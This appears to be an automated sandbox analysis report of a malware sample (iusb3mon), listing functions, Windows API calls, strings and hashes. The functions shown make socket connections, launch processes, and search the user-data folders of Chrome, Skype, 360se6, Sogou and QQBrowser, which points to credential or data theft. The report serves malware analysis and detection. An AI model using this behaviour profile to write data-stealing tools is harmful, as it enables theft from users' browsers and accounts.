Opcode Fuzzy Hash: 3ca5538c3604fe8e9b1ff3acf34a353cb18e9ed1024b60b12f0924aaca13c0d1
Instruction Fuzzy Hash: 6A315572A00119BAEB11DAB4DC89FEB77BCEB04354F000592F709E6180FA75FE948B61

Function 04D71434 Relevance: 10.6, APIs: 7, Instructions: 87networkCOMMON

Download Yara Rule

APIs

Part of subcall function 04D7180D: setsockopt.WS2_32(?,0000FFFF,00000080,04D7546D,00000004), ref: 04D71832
Part of subcall function 04D7180D: CancelIo.KERNEL32(?), ref: 04D7183B
Part of subcall function 04D7180D: InterlockedExchange.KERNEL32(?,00000000), ref: 04D71847
Part of subcall function 04D7180D: closesocket.WS2_32(?), ref: 04D71850
Part of subcall function 04D7180D: SetEvent.KERNEL32(?), ref: 04D71859

ResetEvent.KERNEL32(?,00000000,00000000,00006365), ref: 04D71451
socket.WS2_32(00000002,00000001,00000006), ref: 04D71460
gethostbyname.WS2_32(?), ref: 04D71471
htons.WS2_32(?), ref: 04D71486
connect.WS2_32(?,00000002,00000010), ref: 04D714A3
setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 04D714C8
WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 04D714F9

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Eventsetsockopt$CancelExchangeInterlockedIoctlResetclosesocketconnectgethostbynamehtonssocket
String ID:
API String ID: 4281462294-0
Opcode ID: 8fec843ec34b9a6cee03ff980f07beb1ac7790b35a1620c77cfba762bc3a0d7a
Instruction ID: a4c9bcb0625671819961a69c1b708e4027f7c1b85414ff9fa9e17f7cea53b452
Opcode Fuzzy Hash: 8fec843ec34b9a6cee03ff980f07beb1ac7790b35a1620c77cfba762bc3a0d7a
Instruction Fuzzy Hash: B1318471500218BFE7109FA9DC84EAEBBBDFF04318F104629F651E6390D775AD449B60

Function 04D74D89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79fileCOMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 04D74DBD
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 04D74E10
GetFileSize.KERNEL32(00000000,00000000), ref: 04D74E21
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 04D74E3C

Part of subcall function 04D74D3F: LocalAlloc.KERNEL32(00000040,?), ref: 04D74D52
Part of subcall function 04D74D3F: LocalFree.KERNEL32(00000000,00000000,?), ref: 04D74D7A

CloseHandle.KERNEL32(?), ref: 04D74E59

Strings

.dat, xrefs: 04D74DEB

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFolderFreeHandlePathReadSizeSpecial
String ID: .dat
API String ID: 3272996501-100240174
Opcode ID: 56107723861b13f4585ad3bd6f2988a267f5ce6e2264ff490b7d45366dd2f15d
Instruction ID: 74436f503bcd8f24b9e6962f1777e88b79aa2bf272c5d8c1e9b75fef3769ccb9
Opcode Fuzzy Hash: 56107723861b13f4585ad3bd6f2988a267f5ce6e2264ff490b7d45366dd2f15d
Instruction Fuzzy Hash: 66215772E4021CBBEB15AAA4DC86FEF7B7CFB48754F1009A9F215E2140D6B46E448E60

Function 04D743C6 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77stringprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 04D791B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00006365), ref: 04D79216
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 04D7922E
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 04D7923E
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 04D7924E
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 04D7925B
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 04D79268
Part of subcall function 04D791B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00006365), ref: 04D793F3

lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 04D74421
lstrcpyA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04D74446
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 04D7448C

Strings

WinSta0\Default, xrefs: 04D74462
D, xrefs: 04D74459
Applications\iexplore.exe\shell\open\command, xrefs: 04D74404

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$CreateFreeLoadProcesslstrcpylstrlen
String ID: Applications\iexplore.exe\shell\open\command$D$WinSta0\Default
API String ID: 326945973-490771695
Opcode ID: df8879287903d12a826f72495fdae8e1f9f03c35775c34894edb983efeb5ff35
Instruction ID: e82c0c43fd4386796079f7dca6e07943166f83e1315bede99f2c257390bd7e7b
Opcode Fuzzy Hash: df8879287903d12a826f72495fdae8e1f9f03c35775c34894edb983efeb5ff35
Instruction Fuzzy Hash: 5811B4B2901128FADF209AE1DC48FDF7BBCFF40759F004455BA09E6140FA74AA85DBA0

Function 00581001 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,005723D4,?,110D3D80,?,0058110E,000000FF,0058D604,005723D4,00000000), ref: 005810C2

Strings

ext-ms-, xrefs: 0058106C
api-ms-, xrefs: 00581058

Memory Dump Source

Source File: 00000020.00000002.4542770236.0000000000571000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00570000, based on PE: true

Associated: 00000020.00000002.4542552949.0000000000570000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4542911854.000000000058E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543102062.000000000059C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.000000000059E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005A2000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005E3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543915174.00000000005FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.00000000005FB000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.000000000063F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000655000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006CA000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006D5000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006DF000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006E1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006F7000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000741000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4545109642.00000000009D9000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_570000_iusb3mon.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: d0875aecc129393d693ef82ada874b014efcc04087fb4eee174715f81e2e3ae2
Instruction ID: e3fc00c1a21b0bb8737dd271f2ab7aa57a38a7393964b97df806ba919ca4064d
Opcode Fuzzy Hash: d0875aecc129393d693ef82ada874b014efcc04087fb4eee174715f81e2e3ae2
Instruction Fuzzy Hash: A921F331A01651EBC722BB209C4DA6A3F7CBB517A0F211610ED05B72C1DA30ED46D794

Function 04D83F94 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 61stringCOMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 04D83FD2
GetSystemMetrics.USER32(00000000), ref: 04D83FEA
GetSystemMetrics.USER32(00000001), ref: 04D83FF1
lstrcpyA.KERNEL32(?,DISPLAY), ref: 04D84015

Strings

DISPLAY, xrefs: 04D8400F
B, xrefs: 04D83FB3

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: System$Metrics$InfoParameterslstrcpy
String ID: B$DISPLAY
API String ID: 1409579217-3316187204
Opcode ID: cb36abdb75ccd035fd660e402e761f6d4fcd2faacb31997a9d4e9aafb300f3b6
Instruction ID: 165c06a8dad8729e6012e69303d663ec556132028a246ee7b566dd1cbe9029c4
Opcode Fuzzy Hash: cb36abdb75ccd035fd660e402e761f6d4fcd2faacb31997a9d4e9aafb300f3b6
Instruction Fuzzy Hash: CD11A3717002259FCB11AF54DC849BBBBA8FF09B51B00401AED09DE146E775E950DBA0

Function 04D74796 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04D7479B

Part of subcall function 04D73441: __EH_prolog.LIBCMT ref: 04D73446
Part of subcall function 04D73441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04D7345C
Part of subcall function 04D73441: Process32First.KERNEL32(00000000,?), ref: 04D73475

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 04D747C9

Part of subcall function 04D887FB: lstrlenA.KERNEL32(?), ref: 04D8883F

Part of subcall function 04D88633: __EH_prolog.LIBCMT ref: 04D88638

Part of subcall function 04D885BF: __EH_prolog.LIBCMT ref: 04D885C4

Part of subcall function 04D884B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 04D884C5

Sleep.KERNEL32(000003E8,?,00000000,\AppData\Local\Google\Chrome\User Data\Default,?,C:\Users\,?), ref: 04D74825

Part of subcall function 04D72E2C: __EH_prolog.LIBCMT ref: 04D72E31
Part of subcall function 04D72E2C: FindFirstFileA.KERNEL32(?,?), ref: 04D72EBF
Part of subcall function 04D72E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 04D72F7F

Strings

C:\Users\, xrefs: 04D747F6
\AppData\Local\Google\Chrome\User Data\Default, xrefs: 04D74801
chrome.exe, xrefs: 04D747AC

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: C:\Users\$\AppData\Local\Google\Chrome\User Data\Default$chrome.exe
API String ID: 12226711-2559963756
Opcode ID: 450212583bb1288c0f08b605c3a2d0e73c32eb4ea42f265a0ea9cd476d1294d7
Instruction ID: baf9e72bc7ed49d01adebd553ae24f7d3794d3d458aea7af3b3e0f8883ae3ab0
Opcode Fuzzy Hash: 450212583bb1288c0f08b605c3a2d0e73c32eb4ea42f265a0ea9cd476d1294d7
Instruction Fuzzy Hash: 5A115172A5021AEBEB05FBE4CD46FEEB7B8EF14704F504159B211B21C0DB786B089A71

Function 04D7485C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04D74861

Part of subcall function 04D73441: __EH_prolog.LIBCMT ref: 04D73446
Part of subcall function 04D73441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04D7345C
Part of subcall function 04D73441: Process32First.KERNEL32(00000000,?), ref: 04D73475

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 04D7488F

Part of subcall function 04D887FB: lstrlenA.KERNEL32(?), ref: 04D8883F

Part of subcall function 04D88633: __EH_prolog.LIBCMT ref: 04D88638

Part of subcall function 04D885BF: __EH_prolog.LIBCMT ref: 04D885C4

Part of subcall function 04D884B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 04D884C5

Sleep.KERNEL32(000003E8,?,00000000,\AppData\Roaming\Microsoft\Skype for Desktop,?,C:\Users\,?), ref: 04D748EB

Part of subcall function 04D72E2C: __EH_prolog.LIBCMT ref: 04D72E31
Part of subcall function 04D72E2C: FindFirstFileA.KERNEL32(?,?), ref: 04D72EBF
Part of subcall function 04D72E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 04D72F7F

Strings

C:\Users\, xrefs: 04D748BC
Skype.exe, xrefs: 04D74872
\AppData\Roaming\Microsoft\Skype for Desktop, xrefs: 04D748C7

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: C:\Users\$Skype.exe$\AppData\Roaming\Microsoft\Skype for Desktop
API String ID: 12226711-3499480952
Opcode ID: 5e233de43ec2a278dfe15060fa90372271860d9c722bc18b20d4de2458349acd
Instruction ID: 5cc39ca014daa4a523ff1118a6dc7ceb24146f5742bbc08f545677fae58b6a2a
Opcode Fuzzy Hash: 5e233de43ec2a278dfe15060fa90372271860d9c722bc18b20d4de2458349acd
Instruction Fuzzy Hash: 1D111F72E5021AEAEB05FBE4C946BEEB7B8EB14704F504159B111B21C0DB786B089A65

Function 04D74957 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04D7495C

Part of subcall function 04D73441: __EH_prolog.LIBCMT ref: 04D73446
Part of subcall function 04D73441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04D7345C
Part of subcall function 04D73441: Process32First.KERNEL32(00000000,?), ref: 04D73475

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 04D7498A

Part of subcall function 04D887FB: lstrlenA.KERNEL32(?), ref: 04D8883F

Part of subcall function 04D88633: __EH_prolog.LIBCMT ref: 04D88638

Part of subcall function 04D885BF: __EH_prolog.LIBCMT ref: 04D885C4

Part of subcall function 04D884B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 04D884C5

Sleep.KERNEL32(000003E8,?,00000000,\AppData\Roaming\360se6\User Data\Default,?,C:\Users\,?), ref: 04D749E6

Part of subcall function 04D72E2C: __EH_prolog.LIBCMT ref: 04D72E31
Part of subcall function 04D72E2C: FindFirstFileA.KERNEL32(?,?), ref: 04D72EBF
Part of subcall function 04D72E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 04D72F7F

Strings

\AppData\Roaming\360se6\User Data\Default, xrefs: 04D749C2
C:\Users\, xrefs: 04D749B7
360se6.exe, xrefs: 04D7496D

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: 360se6.exe$C:\Users\$\AppData\Roaming\360se6\User Data\Default
API String ID: 12226711-1244823433
Opcode ID: 9a9d6c5ed717da5dbca4f680a59a89140c5a368702a59dd8dd03d936f20c5f25
Instruction ID: c721a26047b1aef208e9fa802c314d6a45a64d9f9ff8933f13e8d3aa670a59ac
Opcode Fuzzy Hash: 9a9d6c5ed717da5dbca4f680a59a89140c5a368702a59dd8dd03d936f20c5f25
Instruction Fuzzy Hash: 07115172A50219EBEB05FBE4CD46FEEB7B8EF14704F504159B111B21C0DB786B089A71

Function 04D74AE3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04D74AE8

Part of subcall function 04D73441: __EH_prolog.LIBCMT ref: 04D73446
Part of subcall function 04D73441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04D7345C
Part of subcall function 04D73441: Process32First.KERNEL32(00000000,?), ref: 04D73475

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 04D74B16

Part of subcall function 04D887FB: lstrlenA.KERNEL32(?), ref: 04D8883F

Part of subcall function 04D88633: __EH_prolog.LIBCMT ref: 04D88638

Part of subcall function 04D885BF: __EH_prolog.LIBCMT ref: 04D885C4

Part of subcall function 04D884B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 04D884C5

Sleep.KERNEL32(000003E8,?,00000000,\AppData\Roaming\SogouExplorer,?,C:\Users\,?), ref: 04D74B72

Part of subcall function 04D72E2C: __EH_prolog.LIBCMT ref: 04D72E31
Part of subcall function 04D72E2C: FindFirstFileA.KERNEL32(?,?), ref: 04D72EBF
Part of subcall function 04D72E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 04D72F7F

Strings

\AppData\Roaming\SogouExplorer, xrefs: 04D74B4E
C:\Users\, xrefs: 04D74B43
SogouExplorer.exe, xrefs: 04D74AF9

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: C:\Users\$SogouExplorer.exe$\AppData\Roaming\SogouExplorer
API String ID: 12226711-2055279553
Opcode ID: 69b3c8c984f9e3b58bf2bf04a24b19182ea6df32225538010eeaa390d2f59303
Instruction ID: 32513ac4608c882a6a5250e102cddfb6731ccf47eeeb10f5c95386941f7aacf3
Opcode Fuzzy Hash: 69b3c8c984f9e3b58bf2bf04a24b19182ea6df32225538010eeaa390d2f59303
Instruction Fuzzy Hash: 97114F72A50219EAEB05FBE4C946BEEB7B8EB14704F504159B211B21C0DB786B089A75

Function 04D74A1D Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04D74A22

Part of subcall function 04D73441: __EH_prolog.LIBCMT ref: 04D73446
Part of subcall function 04D73441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04D7345C
Part of subcall function 04D73441: Process32First.KERNEL32(00000000,?), ref: 04D73475

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 04D74A50

Part of subcall function 04D887FB: lstrlenA.KERNEL32(?), ref: 04D8883F

Part of subcall function 04D88633: __EH_prolog.LIBCMT ref: 04D88638

Part of subcall function 04D885BF: __EH_prolog.LIBCMT ref: 04D885C4

Part of subcall function 04D884B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 04D884C5

Sleep.KERNEL32(000003E8,?,00000000,\AppData\Local\Tencent\QQBrowser\User Data\Default,?,C:\Users\,?), ref: 04D74AAC

Part of subcall function 04D72E2C: __EH_prolog.LIBCMT ref: 04D72E31
Part of subcall function 04D72E2C: FindFirstFileA.KERNEL32(?,?), ref: 04D72EBF
Part of subcall function 04D72E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 04D72F7F

Strings

\AppData\Local\Tencent\QQBrowser\User Data\Default, xrefs: 04D74A88
C:\Users\, xrefs: 04D74A7D
QQBrowser.exe, xrefs: 04D74A33

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: C:\Users\$QQBrowser.exe$\AppData\Local\Tencent\QQBrowser\User Data\Default
API String ID: 12226711-2662846904
Opcode ID: 42586d652a24764fa96004aae8d1db3a77b9274ea4cde138dbcf9d047c8fb695
Instruction ID: 0410d2dd0c54d2daa0573970c7bf011d6be208b295108550bcf0f1da02b4a093
Opcode Fuzzy Hash: 42586d652a24764fa96004aae8d1db3a77b9274ea4cde138dbcf9d047c8fb695
Instruction Fuzzy Hash: 48114F72A50219EAEB05FBE4C946FFEB7B8EB14704F504159B212B21C0DB786B089A61

Function 04D74BA9 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04D74BAE

Part of subcall function 04D73441: __EH_prolog.LIBCMT ref: 04D73446
Part of subcall function 04D73441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04D7345C
Part of subcall function 04D73441: Process32First.KERNEL32(00000000,?), ref: 04D73475

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 04D74BDC

Part of subcall function 04D887FB: lstrlenA.KERNEL32(?), ref: 04D8883F

Part of subcall function 04D88633: __EH_prolog.LIBCMT ref: 04D88638

Part of subcall function 04D885BF: __EH_prolog.LIBCMT ref: 04D885C4

Part of subcall function 04D884B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 04D884C5

Sleep.KERNEL32(000003E8,?,00000000,\AppData\Local\Google\Chrome\User Data\Default,?,C:\Users\,?), ref: 04D74C38

Part of subcall function 04D72E2C: __EH_prolog.LIBCMT ref: 04D72E31
Part of subcall function 04D72E2C: FindFirstFileA.KERNEL32(?,?), ref: 04D72EBF
Part of subcall function 04D72E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 04D72F7F

Strings

C:\Users\, xrefs: 04D74C09
\AppData\Local\Google\Chrome\User Data\Default, xrefs: 04D74C14
chrome.exe, xrefs: 04D74BBF

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: C:\Users\$\AppData\Local\Google\Chrome\User Data\Default$chrome.exe
API String ID: 12226711-2559963756
Opcode ID: cb1f187bcff7eed4f3412e7540a2fa870520ccc22631af2142a8cd6607e29d5e
Instruction ID: 282628e2d29b313f9abdb9a604a79e111f07a2c95a82ae62c96a6582d447b22c
Opcode Fuzzy Hash: cb1f187bcff7eed4f3412e7540a2fa870520ccc22631af2142a8cd6607e29d5e
Instruction Fuzzy Hash: 25115172A5021AEBEB05FBE4CD46FEEB7B8EF14704F504159B211B21C0DB786B089A71

Function 04D73C01 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40sleepfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,000000E1), ref: 04D73C3D
CopyFileA.KERNEL32(?,?,00000000), ref: 04D73C53

Part of subcall function 04D73BBA: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 04D73BD0
